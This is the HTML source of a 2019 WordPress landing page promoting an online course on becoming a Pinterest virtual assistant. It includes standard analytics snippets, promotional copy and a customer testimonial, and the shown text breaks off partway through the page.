<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head > <meta charset="UTF-8" /> <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet"><meta name="viewport" content="width=device-width, initial-scale=1" /> <!-- [BEGIN] Metadata added via All-Meta-Tags plugin by Space X-Chimp ( https://www.spacexchimp.com ) --> <meta name='p:domain_verify' content='&lt;meta name=&quot;p:domain_verify&quot; content=&quot;53a5581d0d8b4751adc5090097ecad52&quot;/&gt;' /> <!-- [END] Metadata added via All-Meta-Tags plugin by Space X-Chimp ( https://www.spacexchimp.com ) --> <title>Pinterest Virtual Assistant - Become a Pinterest VA Today!</title> <!-- Social Warfare v3.5.4 https://warfareplugins.com --><meta property="og:description" content="Work from wherever you want, whenever you want. Get paid to play on Pinterest. 📌 Take control over your career future by becoming a Pinterest virtual assistant today! https://vimeo.com/286085958 ADD ME TO THE WAITLIST! There is no other online program like Become a Pinterest VA TODAY! on the market.This highly coveted service offering is in demand by bloggers and business"><meta property="og:title" content="Pinterest Virtual Assistant"><meta property="article_publisher" content="https://www.facebook.com/pinterestva/"><meta name='image' property='og:image' content='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Screen-Shot-2018-08-02-at-10.47.39-AM.png'><meta property="fb:app_id" content="529576650555031"><meta property="og:type" content="article"><meta property="og:url" content="https://pinterestva.com/"><meta property="og:site_name" content="Become a Pinterest VA Today!"><meta property="article:published_time" content="2019-03-28T16:44:48+00:00"><meta property="article:modified_time" content="2019-05-09T16:22:28+00:00"><meta property="og:updated_time" content="2019-05-09T16:22:28+00:00"><meta name="twitter:title" content="Pinterest Virtual Assistant"><meta name="twitter:description" content="Work from wherever you want, whenever you want. Get paid to play on Pinterest. 📌 Take control over your career future by becoming a Pinterest virtual assistant today! https://vimeo.com/286085958 ADD ME TO THE WAITLIST! There is no other online program like Become a Pinterest VA TODAY! on the market.This highly coveted service offering is in demand by bloggers and business"><meta name="twitter:image" content="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Screen-Shot-2018-08-02-at-10.47.39-AM.png"><meta name="twitter:creator" content=""><meta name="twitter:card" content="summary_large_image"><style>@font-face {font-family: "sw-icon-font";src:url("https://pinterestva.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.4");src:url("https://pinterestva.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.4#iefix") format("embedded-opentype"),url("https://pinterestva.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.4") format("woff"), url("https://pinterestva.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.4") format("truetype"),url("https://pinterestva.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.4#1445203416") format("svg");font-weight: normal;font-style: normal;}</style> <!-- Social Warfare v3.5.4 https://warfareplugins.com --> <!-- This site is optimized with the Yoast SEO plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://pinterestva.com/" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Work from wherever you want, whenever you want. Get paid to play on Pinterest. 📌 Take control over your career future by becoming a Pinterest virtual assistant today! https://vimeo.com/286085958 ADD ME TO THE WAITLIST! There is no other online program like Become a Pinterest VA TODAY! on the market. This highly coveted service offering is in demand by bloggers and... Read More" /> <meta name="twitter:title" content="Pinterest Virtual Assistant - Become a Pinterest VA Today!" /> <meta name="twitter:image" content="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Screen-Shot-2018-08-02-at-10.47.39-AM.png" /> <meta name="p:domain_verify" content="53a5581d0d8b4751adc5090097ecad52" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://pinterestva.com/#organization","name":"Become a Pinterest VA TODAY!","url":"https://pinterestva.com/","sameAs":["https://www.pinterest.com/pinterestVAtoday/"],"logo":{"@type":"ImageObject","@id":"https://pinterestva.com/#logo","url":"http://pinterestva.com/wp-content/uploads/2017/07/Become-a-Pinterest-VA-Logo.png","caption":"Become a Pinterest VA TODAY!"},"image":{"@id":"https://pinterestva.com/#logo"}},{"@type":"WebSite","@id":"https://pinterestva.com/#website","url":"https://pinterestva.com/","name":"Become a Pinterest VA Today!","publisher":{"@id":"https://pinterestva.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://pinterestva.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://pinterestva.com/#webpage","url":"https://pinterestva.com/","inLanguage":"en-US","name":"Pinterest Virtual Assistant - Become a Pinterest VA Today!","isPartOf":{"@id":"https://pinterestva.com/#website"},"about":{"@id":"https://pinterestva.com/#organization"},"image":{"@type":"ImageObject","@id":"https://pinterestva.com/#primaryimage","url":"https://pinterestva.com/wp-content/uploads/2018/08/Screen-Shot-2018-08-02-at-10.47.39-AM.png","caption":""},"primaryImageOfPage":{"@id":"https://pinterestva.com/#primaryimage"},"datePublished":"2019-03-28T21:44:48+00:00","dateModified":"2019-05-09T21:22:28+00:00"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//code.ionicframework.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Become a Pinterest VA Today! &raquo; Feed" href="https://pinterestva.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Become a Pinterest VA Today! &raquo; Comments Feed" href="https://pinterestva.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pinterestva.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='social-warfare-block-css-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='slick-styles-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/css/slick.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='//maxcdn.bootstrapcdn.com/font-awesome/latest/css/font-awesome.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='captivating-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/style.css?ver=1.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css?ver=1.12' type='text/css' media='all' /> <link rel='stylesheet' id='social_warfare-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.4' type='text/css' media='all' /> <link rel='stylesheet' id='google-font-css' href='//fonts.googleapis.com/css?family=Montserrat%3A300%2C300i%2C400%2C700%2C700i%7COpen+Sans%3A400%2C400i%2C700%2C700i%7CPlayfair+Display%3A400%2C400i%2C700%2C700i%7CPoppins&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='ionicons-css' href='//code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css?ver=1.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/css/dashicons.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='captivating-gutenberg-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/lib/gutenberg/front-end.css?ver=1.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=4.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-animations-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=2.5.14' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1556343286' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-pro-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/elementor/css/custom-pro-frontend.min.css?ver=1556343294' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-global-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/elementor/css/global.css?ver=1556343286' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-1949-css' href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/elementor/css/post-1949.css?ver=1557436993' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Montserrat%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7COpen+Sans%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7COswald%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7COpen+Sans+Condensed%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/themes/restored316-captivating/js/global.js?ver=1.0.0'></script> <link rel='https://api.w.org/' href='https://pinterestva.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pinterestva.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://pinterestva.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://pinterestva.com/' /> <link rel="alternate" type="application/json+oembed" href="https://pinterestva.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpinterestva.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://pinterestva.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpinterestva.com%2F&#038;format=xml" /> <style type="text/css"> .enews .screenread { height: 1px; left: -1000em; overflow: hidden; position: absolute; top: -1000em; width: 1px; } </style><!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '260632881110671'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=260632881110671&ev=PageView&noscript=1" /></noscript> <!-- End Facebook Pixel Code --> <!--PROOF PIXEL--><script src="https://cdn.useproof.com/proof.js?acc=rewyevwsT0VCwKQacXhDs6eWw6V2" async></script><!--END PROOF PIXEL--> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-N8D2X6P');</script> <!-- End Google Tag Manager --><link rel="pingback" href="https://pinterestva.com/xmlrpc.php" /> <style type="text/css">.site-title a { background: url(https://pinterestva.com/wp-content/uploads/2019/01/become-a-pinterest-va-today-logo-a.png) no-repeat !important; }</style> <script> jQuery(document).ready(function($) { var delay = 100; setTimeout(function() { $('.elementor-tab-title').removeClass('elementor-active'); $('.elementor-tab-content').css('display', 'none'); }, delay); }); </script><link rel="icon" href="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/cropped-PVA-Logo-Blue-1-32x32.png" sizes="32x32" /> <link rel="icon" href="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/cropped-PVA-Logo-Blue-1-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/cropped-PVA-Logo-Blue-1-180x180.png" /> <meta name="msapplication-TileImage" content="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/cropped-PVA-Logo-Blue-1-270x270.png" /> <style type="text/css" id="wp-custom-css"> .site-inner { margin: 0px auto; max-width: 1080px; } p { font-family: 'Open Sans',Helvetica,Arial,Lucida,sans-serif; font-weight: 500; font-size: 22px; line-height: 1.5em; } h1, h2, h3, h4, h5, h6 { font-family: 'Montserrat',Helvetica,Arial,Lucida,sans-serif; font-weight: bold; color: #003366; } .single-post .entry-content h1, .page .entry-content h1 { font-weight: bold; font-size: 30px; } .single-post article .entry-content h2:first-of-type, .page article .entry-content h2:first-of-type { font-style: normal; font-weight: bold; padding-left: 0; border-left: none; font-size: 26px; } .single-post article .entry-content h3, .page article h3 { font-size: 22px; } .single-post article .entry-content h3, .page article h3, .single-post article .entry-content h5, .page article h5 { text-transform: none; } .single-post article .entry-content h4, .page article h4 { font-style:normal; font-size: 20px; } .page.elementor-page .entry-header { display:none; } .elementor p, .elementor h1, .elementor h2, .elementor h3, .elementor h4, .elementor h5, .elementor h6, .et_builder_outer_content p, .et_builder_outer_content h1, .et_builder_outer_content h2, .et_builder_outer_content h3, .et_builder_outer_content h4, .et_builder_outer_content h5, .et_builder_outer_content h6 { font-family: inherit; font-weight: inherit; font-size: inherit; color: inherit; } .pricing-list ul { list-style: none !important; /* Remove default bullets */ } .pricing-list ul li::before { content: "\2022"; /* Add content: \2022 is the CSS Code/unicode for a bullet */ color: #ed218d; /* Change the color */ font-weight: bold; /* If you want it to be bold */ display: inline-block; /* Needed to add space between the bullet and the text */ width: 1em; /* Also needed for space (tweak if needed) */ margin-left: -1em; /* Also needed for space (tweak if needed) */ } .entry-content .pricing-list ul > li { list-style-type: none; } .site-footer p { font-size: 12px; } .page-template-elementor_canvas { margin: 0; } </style> </head> <body class="home page-template-default page page-id-1949 wp-embed-responsive custom-header header-image header-full-width full-width-content elementor-default elementor-page elementor-page-1949 captivating-blog" itemscope itemtype="https://schema.org/WebPage"><div class="site-container"><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><p class="site-title" itemprop="headline"><a href="https://pinterestva.com/">Become a Pinterest VA Today!</a></p></div></div></header><div class="site-inner"><div class="content-sidebar-wrap"><main class="content"><article class="post-1949 page type-page status-publish has-post-thumbnail entry" itemscope itemtype="https://schema.org/CreativeWork"><header class="entry-header"><div class="home-featured-image"><a href="https://pinterestva.com/"><img width="820" height="550" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2018/08/Screen-Shot-2018-08-02-at-10.47.39-AM-820x550.png" class="aligncenter" alt="" /></a></div><h1 class="entry-title" itemprop="headline">Pinterest Virtual Assistant</h1> </header><div class="entry-content" itemprop="text"> <div data-elementor-type="post" data-elementor-id="1949" class="elementor elementor-1949" data-elementor-settings="[]"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section class="elementor-element elementor-element-583dcf0 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="583dcf0" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-e2442b5 elementor-column elementor-col-100 elementor-top-column" data-id="e2442b5" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-0117115 elementor-widget elementor-widget-text-editor" data-id="0117115" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: center;"><em>Work from <span style="color: #e6477e;"><strong>wherever</strong></span> you want, <span style="color: #e6477e;"><strong>whenever</strong> </span>you want.</em></p></div> </div> </div> <div class="elementor-element elementor-element-29ea952 elementor-widget elementor-widget-heading" data-id="29ea952" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Get paid to play on Pinterest. 📌</h2> </div> </div> <div class="elementor-element elementor-element-a6d7482 elementor-widget elementor-widget-text-editor" data-id="a6d7482" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: center;"><strong><span style="color: #000000; text-align: center;">Take control over your career future by becoming a Pinterest virtual assistant today! <br /></span></strong></p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-6a4e4cf elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="6a4e4cf" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-d188278 elementor-column elementor-col-100 elementor-top-column" data-id="d188278" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-112b955 elementor-aspect-ratio-169 elementor-widget elementor-widget-video" data-id="112b955" data-element_type="widget" data-settings="{&quot;aspect_ratio&quot;:&quot;169&quot;}" data-widget_type="video.default"> <div class="elementor-widget-container"> <div class="elementor-wrapper elementor-fit-aspect-ratio elementor-open-inline"> <iframe class="elementor-video-iframe" allowfullscreen src="https://player.vimeo.com/video/286085958?color&amp;autopause=0&amp;loop=0&amp;muted=0&amp;title=1&amp;portrait=1&amp;byline=1#t="></iframe> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-b2f04d8 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="b2f04d8" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-5f385f8 elementor-column elementor-col-100 elementor-top-column" data-id="5f385f8" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-314175b elementor-align-center elementor-widget elementor-widget-button" data-id="314175b" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://pinterestva.lpages.co/leadbox/140d85c73f72a2%3A1521bf1e0946dc/5668600916475904" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">ADD ME TO THE WAITLIST!</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-1e895e5 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="1e895e5" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-f0c9d69 elementor-column elementor-col-100 elementor-top-column" data-id="f0c9d69" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-d9e585e elementor-widget elementor-widget-text-editor" data-id="d9e585e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: center;"><strong><span style="color: #000000; text-align: center;">There is no other online program like <br /></span><span style="color: #000000; text-align: center;"><em>Become a Pinterest VA TODAY!</em> on the market.</span></strong></p></div> </div> </div> <div class="elementor-element elementor-element-79ced92 elementor-widget elementor-widget-text-editor" data-id="79ced92" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: center;">This highly coveted service offering is <strong>in demand</strong> by bloggers and business owners alike.</p><p style="text-align: center;">We’ll teach you <em>exactly</em> what you need to know to launch your Pinterest virtual assistant biz from scratch (or take your existing VA biz up a notch!) and start getting paid what you’re worth. <span style="font-weight: 400;">🤑</span></p><p style="text-align: center;">Read 👇 to learn how to become a Pinterest virtual assistant!</p></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-e30bf95 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="e30bf95" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-9b7b782 elementor-column elementor-col-100 elementor-top-column" data-id="9b7b782" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-73d5ca1 elementor-align-center elementor-widget elementor-widget-button" data-id="73d5ca1" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://pinterestva.lpages.co/leadbox/140d85c73f72a2%3A1521bf1e0946dc/5668600916475904" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">ADD ME TO THE WAITLIST!</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-8ff1ec5 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="8ff1ec5" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-24f5e86 elementor-column elementor-col-100 elementor-top-column" data-id="24f5e86" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-element elementor-element-5342e26 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="5342e26" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-147cd12 elementor-column elementor-col-100 elementor-inner-column" data-id="147cd12" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-0e15626 elementor-widget elementor-widget-heading" data-id="0e15626" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">What would happen if you...</h2> </div> </div> <div class="elementor-element elementor-element-330f19e elementor-widget elementor-widget-text-editor" data-id="330f19e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p style="text-align: left;"><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f3e1.svg" alt="🏡" /> Worked at home (or anywhere!) for just one hour per week per client at a time that was convenient for you?</p><p style="text-align: left;"><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f37d.svg" alt="🍽" /> Had <em>the most interesting job</em> at the dinner party?</p><p style="text-align: left;"><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2615.svg" alt="☕" /> Went to the doctor, volunteered in your kid’s classroom or had coffee with a friend – during the DAY!</p><p style="text-align: left;"><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f4b5.svg" alt="💵" /> Started a new side hustle and built a business that pays more than your day job?</p><h2 style="color: #0d3564; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; text-align: center;" data-elementor-setting-key="title" data-pen-placeholder="Type Here...">Pinterest VAs and Pinterest Managers come from all backgrounds&#8230;</h2><p>👠 Career changers looking to build a virtual biz &amp; master a new skill.</p><p><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f469-200d-1f467-200d-1f466.svg" alt="👩‍👧‍👦" /> SAHM&#8217;s looking to bring extra income into their household.</p><p><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f4cc.svg" alt="📌" /> Social media managers looking to learn and offer Pinterest services.</p><p><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f469-200d-1f4bb.svg" alt="👩‍💻" /> Existing virtual assistants looking to niche down and/or scale their biz.</p><p><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f4bb.svg" alt="💻" /> Tech-savvy recent retirees looking to supplement their retirement income.</p><p><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f4b0.svg" alt="💰" /> Anyone that loves Pinterest and could benefit from some extra spending money.</p></div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-e6e91ab elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="e6e91ab" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-22a1c3c elementor-column elementor-col-100 elementor-top-column" data-id="22a1c3c" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-3204b7e elementor-widget elementor-widget-heading" data-id="3204b7e" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Meet Megan!</h2> </div> </div> <div class="elementor-element elementor-element-c4e831a elementor-widget elementor-widget-text-editor" data-id="c4e831a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Megan became a Pinterest virtual assistant because she wanted more flexibility with her schedule. </h3><h3> </h3><h3>Within 30 days of signing up for the course, she gained confidence and landed her first client! </h3><h3> </h3><h3>Eight months later, she now has 12 monthly Pinterest management clients while traveling the world. </h3></div> </div> </div> <div class="elementor-element elementor-element-b4b3fa8 elementor-aspect-ratio-169 elementor-widget elementor-widget-video" data-id="b4b3fa8" data-element_type="widget" data-settings="{&quot;aspect_ratio&quot;:&quot;169&quot;}" data-widget_type="video.default"> <div class="elementor-widget-container"> <div class="elementor-wrapper elementor-fit-aspect-ratio elementor-open-inline"> <iframe class="elementor-video-iframe" 